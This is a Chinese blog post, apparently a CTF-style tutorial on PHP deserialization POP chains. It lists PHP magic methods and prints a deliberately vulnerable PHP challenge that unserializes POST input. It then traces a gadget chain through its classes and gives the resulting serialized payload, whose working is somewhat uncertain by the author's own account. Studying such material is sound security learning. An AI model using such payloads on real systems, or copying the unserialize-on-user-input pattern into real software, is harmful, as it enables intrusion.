pop链初见

最新推荐文章于 2024-09-17 22:54:53 发布
最新推荐文章于 2024-09-17 22:54:53 发布
阅读量882 收藏 25
点赞数 25
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XYpangSJ/article/details/136037361
版权

魔术方法

感谢大力支持PHP反序列化之POP链构造🛴 | ch1e的自留地

深入了解:

 PHP之十六个魔术方法详解_php 魔术方法-CSDN博客

一、 __construct(),类的构造函数

二、__destruct(),类的析构函数

三、 __call(),在对象中调用一个不可访问方法时调用。

四、 __callStatic(),用静态方式中调用一个不可访问方法时调用

五、 __get(),获得一个类的成员变量时调用

六、 __set(),设置一个类的成员变量时调用

七、 __isset(),当对不可访问属性调用isset()或empty()时调用

八、 __unset(),当对不可访问属性调用unset()时被调用。

九、 __sleep(),执行serialize()时,先会调用这个函数

十、 __wakeup(),执行unserialize()时,先会调用这个函数

十一、 __toString(),类被当成字符串时的回应方法

十二、 __invoke(),调用函数的方式调用一个对象时的回应方法

十三、 __set_state(),调用var_export()导出类时,此静态方法会被调用。

十四、 __clone(),当对象复制完成时调用

十五、__autoload(),尝试加载未定义的类

十六、__debugInfo(),打印所需调试信息

 __destruct()销毁时机(可能你知道)

引自 [php]对象的销毁时机_php 类的对象在什么适合被销毁-CSDN博客

1.如果程序结束,所有变量都会被销毁,自然,变量所代表的对象也会被销毁。

2.若一个对象没有任何变量指向它,那么即使程序还没有结束,这个对象也会被销毁。

例题

<?php
class Rd
{
    public $ending;
    public $cl;

    public $poc;

    public function __destruct()
    {
        echo "All matters have concluded" . "</br>";
    }

    public function __call($name, $arg)
    {
        foreach ($arg as $key => $value) {

            if ($arg[0]['POC'] == "0.o") {
                $this->cl->var1 = "get";
            }
        }
    }
}

class Poc
{
    public $payload;

    public $fun;

    public function __set($name, $value)
    {
        $this->payload = $name;
        $this->fun = $value;
    }

    function getflag($paylaod)
    {
        echo "Have you genuinely accomplished what you set out to do?" . "</br>";
        file_get_contents($paylaod);
    }
}

class Er
{
    public $symbol;
    public $Flag = 'aHR0cDovLw==';

    public function __construct()
    {
        $this->symbol = True;
    }

    public function __set($name, $value)
    {
        if (preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/', base64_decode($this->Flag))) {
            $value($this->Flag);
        } else {
            echo "NoNoNo,please you can look hint.php" . "</br>";
        }
    }


}

class Ha
{
    public $start;
    public $start1;
    public $start2 = 'o.0';

    public function __construct()
    {
        echo $this->start1 . "__construct" . "</br>";
    }

    public function __destruct()
    {
        if ($this->start2 === "o.0") {
            $this->start1->Love($this->start);
            echo "you are good" . "</br>";
            echo "<script>you got it!!!</script>";

        }
    }
}

function getttt($url) {
    echo "you got it!!!". "</br>";


}


if (isset($_POST['pop'])) {   
    $a = unserialize($_POST['pop']);
} else {
    die("You are Silly goose!");
}

出口为

function getttt($url) {
    echo "you got it!!!". "</br>";
}

看到有四个类Rd,Poc,Er,Ha

Rd

含有方法__destruct(),__call

因为__destruct()中只有echo,其他类中没有可以受其影响的所以可不做考虑

看看__call(调用不可能方法触发)

forech函数:foreach php,详解PHP中foreach的用法和实例-CSDN博客

public function __call($name, $arg)
    {
        foreach ($arg as $key => $value) {

            if ($arg[0]['POC'] == "0.o") {
                $this->cl->var1 = "get";
            }
        }
    }

 在cl下的var1写一个get,但是public中么有为cl定义var1

可见其可以触发__set方法

Poc

含有方法__set(),定义方法getflag()(暂时不用)

看看set方法

public function __set($name, $value)
    {
        $this->payload = $name;
        $this->fun = $value;
    }

调用payload和fun并赋值,观察并不能触发魔术方法

Er

定义flag =为'aHR0cDovLw=='

含有方法__construct(),__set()

看看__construct()

 public function __construct()
    {
        $this->symbol = True;
    }

 给symbol赋值为true

看看__set()

 public function __set($name, $value)
    {
        if (preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/', base64_decode($this->Flag))) {
            $value($this->Flag);
        } else {
            echo "NoNoNo,please you can look hint.php" . "</br>";
        }
    }

 因为flag满足所以else不执行,所以看if即可

调用flag,value并赋值

Ha

含有方法__construct(),__destruct()

定义start2= 'o.0'

看看__construct()

 public function __construct()
    {
        echo $this->start1 . "__construct" . "</br>";
    }

调用start1

看看__destruct()

public function __destruct()
    {
        if ($this->start2 === "o.0") {
            $this->start1->Love($this->start);
            echo "You are Good!" . "</br>";

        }
    }

if条件天然满足,其中调用不存在函数love()(可触发__call)

over

思路

我们审计代码发现除去必定执行的__destruct,__construct

有__call,__set这些选择执行的于是便重点关注

发现call中不仅有我们需要的get还可以触发poc和er类中的set

那就挑一个set使用

再发现er中的set可以直接把get传到value中

于是可以确定调用er,和rd

再因为只有ha可以调用er中的set

这时发现已经可以自己跑了于是确定使用rd,poc,ha

那么删去原本函数

function getttt($url) {
    echo "you got it!!!". "</br>";


}


if (isset($_POST['pop'])) {   
    $a = unserialize($_POST['pop']);
} else {
    die("You are Silly goose!");
}

后调用一下

$A= new Ha;
$B= new Rd;
$C=new Er;

因为要让他们相互影响,所以要让他们包含起来

找一些不必要变量赋值即可

$A->start1=$B;
$B->cl=$C;

发现要满足条件关系让rd代码是可以运行的(正确与否不重要)补充条件

$A->start=array('POC'=>"0");

反序列化输出$A即可

echo serialize ($A);

输出

得到

__construct</br>O:2:"Ha":3:{s:5:"start";a:1:{s:3:"POC";s:1:"0";}s:6:"start1";O:2:"Rd":3:{s:6:"ending";N;s:2:"cl";O:2:"Er":2:{s:6:"symbol";b:1;s:4:"Flag";s:12:"aHR0cDovLw==";}s:3:"poc";N;}s:6:"start2";s:3:"o.0";}You are Good!</br>All matters have concluded</br>

再得到

O:2:"Ha":3:{s:5:"start";a:1:{s:3:"POC";s:1:"0";}s:6:"start1";O:2:"Rd":3:{s:6:"ending";N;s:2:"cl";O:2:"Er":2:{s:6:"symbol";b:1;s:4:"Flag";s:12:"aHR0cDovLw==";}s:3:"poc";N;}s:6:"start2";s:3:"o.0";}

开环境看看

??后来发现好像js出问题了

 莫得显示,但无伤大雅

结束!

XYpangSJ
关注
pop.rar_pop
09-22
"pop.rar_pop"这个文件名可能是指一个压缩包,其中包含了与Java相关的代码或资源,特别是与图像处理和用户界面设计有关的部分。描述中的“image resize in java can be used in applet or window”暗示了压缩包内的...
Pop-up Photo Wall 1.6
08-09
Pop-up Photo Wall 1.6
C#实现POP3邮件接收程序
12-22
本文通过运用C#来实现一个基于POP3协议的邮件接收程序来向大家展示C#网络编程的功能强大,同时也向大家介绍一下基于POP3协议的电子邮件接收原理。  首先我向大家介绍邮件接收的基本原理:  一开始便是客户端与...
Android】【Bug】使用OSmdroid绘制轨迹断裂问题
每天不是在写bug就是在写bug的路上
09-14 898
使用OSmdroid绘制轨迹断裂问题
【兼容性记录】video标签在 IOS 和 安卓中的问题
fans_x的博客
09-13 938
业务需求背景:由于业务中涉及到有视频播放的内容,所以就使用了video标签去做,但是video标签在ios 设备和安卓设备中的默认行为不一致,故记录下解决方法(折中办法)。
Android 内置应用裁剪
Framework-coder的博客
09-13 205
参考 AOSP 中 PRODUCT_PACKAGES 配置的方式,自定义一个“PRODUCT_PACKAGES_REMOVE”配 置选项。用户可根据自身项目的需要,将需裁剪的 APK 名称(无需 .apk 后缀) 都添加到“PRODUCT_PACKAGES_REMOVE”项下,从而做到一次性全部裁剪。此方法省去了查找目标 APK 的编译.mk 文件的时间,提高了工作效率。补丁如下:从以上补丁可以发现,只要是添加在“PRODUCT_PACKAGES_REMOVE”配置项下的 APK 都将被裁剪。
android 14.0 USB连接模式默认设为MTP
安卓兼职framework和app工程师的博客
09-13 412
在14.0android系统产品开发中,在通过otg连接设备的时候,会弹出usb连接模式这时候会让客户选择当前连接电脑是 哪种模式,在项目开发中,需要以mtp模式,就是可以在电脑查看设备的内部存储的样式来设置otg连接电脑的模式, 接下来分析下相关模式,来具体实现相关功能
Android14 蓝牙 BluetoothService 启动和相关代码介绍
wenzhi的博客
09-14 1806
蓝牙开关和使能开发主要用到:BluetoothService、BluetoothManagerService、BluetoothManager、BluetoothAdapter 这几个系统相关类。某个蓝牙的配对、连接、断开 使用的是 BluetoothDevice 对象。蓝牙开关状态不记忆或者打开异常就可以看看BluetoothManagerService的日志,里面有打开关闭相关过程日志和时间点,这个对问题分析有一定的帮助。本文主要介绍一下 framework 相关的几个类,
Thinkphp5 + Swoole实现邮箱异步通知
Crazy_shark的博客
09-11 789
通过 Swoole 实现的异步任务处理机制,可以将耗时操作如发送邮件等操作放入后台异步执行,提升用户体验和系统性能。Swoole 的 Task 机制非常适合处理这种场景,结合 ThinkPHP 使得开发异步任务更加简单高效。
php 实现JWT
Crazy_shark的博客
09-11 762
在 PHP 中,JSON Web Token (JWT) 是一种开放标准 (RFC 7519) 用于在各方之间作为 JSON 对象安全地传输信息。JWT 通常用于身份验证系统,如 OAuth2 或基于令牌的身份验证。以下是一个基本的 PHP 实现 JWT 生成和验证的代码示例。
Android MediaPlayer + GLSurfaceView 播放视频
ansondroider的博客
09-16 1494
Android开发中,使用OpenGL ES来渲染视频是一种常见的需求,尤其是在需要实现自定义的视频播放界面或者视频特效时。结合MediaPlayer,我们可以实现一个功能强大的视频播放器。以下是一个简单的示例,展示如何在Android应用中使用OpenGL ES和MediaPlayer播放本地视频。
Android 11 FileProvider的使用和限制
qq_34629725的博客
09-12 643
Android 7开始,将不允许在app之间,使用file uri,即file://的方式,传递一个file,否则会抛出异常:FileUriExposedException ,其解决方案,就是使用FileProvider,用content://代替file://,同时需要将targetSdk,升级到24。主要用于系统相机拍照及图片裁剪、应用之间数据访问、应用的升级等。
反编译 AndroidManifest.xml文件-android反编译技术
cybersnow精通 28 门计算机语言,凭借其超凡的技术能力,成功开发过上万个应用,广泛涉及政府、商业、个人等众多领域,甚至在检察院、环保局、公安局等专业场景中也大放异彩。不仅熟练掌握单片机和物联网开发,在软件架构设计方面更是独树一帜,自创了跨平台软件
09-17 579
想要查看原来版本配置和关联信息,被打包了,这时候需要工具。
Android13 Launcher3屏蔽桌面指示器
09-12 588
Launcher3自定义开发,屏蔽分页指示器
Android的内核
jmshl的专栏
09-12 611
总的来说,在深入了解Android内核后,可以看到它不仅仅是操作系统的核心部分,而是支撑整个Android生态系统的关键。从内核的结构和版本管理到与硬件的复杂互动,每一个环节都是确保设备正常运行的重要组成部分。Android作为一个广泛使用的操作系统,其根基在于内核的设计和功能。
RK3229_Android9.0_Box 4G模块EC200A调试
suifen_的博客
09-11 769
"mobile,0,0,0,-1,true"
Android 后台服务之Persistent 属性
最新发布
xiangzhihong8的专栏
09-17 527
Android 开发中,有时我们需要后台服务持续运行,以保持应用的某些功能。例如,音乐播放器需要在后台播放音乐,或者健康应用需要持续跟踪用户的运动数据。后台服务是 Android 中的一种组件,它不与用户界面交互,能够在后台执行长时间运行的任务。由于 Android 系统的资源管理策略,这些服务可能会被系统杀死以释放资源。在某些情况下,我们希望服务能够持续存在,避免被系统回收。这时,我们需要将服务设为持久(Persistent)。
Android Auto助力电动汽车智能驾驶
2301_76380919的博客
09-12 506
相比传统汽车系统,Android Auto 提供了更加流畅的用户体验,能够无缝对接电动汽车的控制系统,实时更新信息并提供个性化服务。总的来说,电动汽车与 Android Auto 的结合不仅提升了驾驶便利性和娱乐性,还为用户提供了更高的安全保障。无论是追求环保的电动汽车爱好者,还是寻求智能驾控体验的用户,Android Auto 都将成为你最佳的智能出行伙伴。此外,系统能够在选择路线时添加不同的充电站,计划何时充电,并确保在充电站停留足够时间,以便电池电量达到前往下一站所需的水平。
Chrome远程桌面安卓版怎么使用?
meiyimin的专栏
09-13 518
借助这款软件,您可以通过电脑、平板或安卓手机远程控制计算机桌面,实现便捷的远程操作。另外,您也可以选择“输入安全码”直接进行连接,这种方式则更加迅速,适合于需要快速访问的情况。尽管该应用没有提供一些额外功能,如文件拖放传输和实时聊天等,但它的免费和易于设置的特点使其成为一个不错的选择,适合基本的远程访问需求。接着,点击“我的计算机”下的“开始使用”,然后选择“启用远程连接”。远程看看是一款免费的远程控制软件,该软件的操作步骤非常简便,即使是初学者也能快速上手,确保您能够顺利实现远程控制的目的。
php反序列化pop
10-17
下面是一个简单的POP示例: ``` class A { public $b; function __construct($b) { $this->b = $b; } function __wakeup() { if (isset($this->b)) { unserialize($this->b); } } } class B { public ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值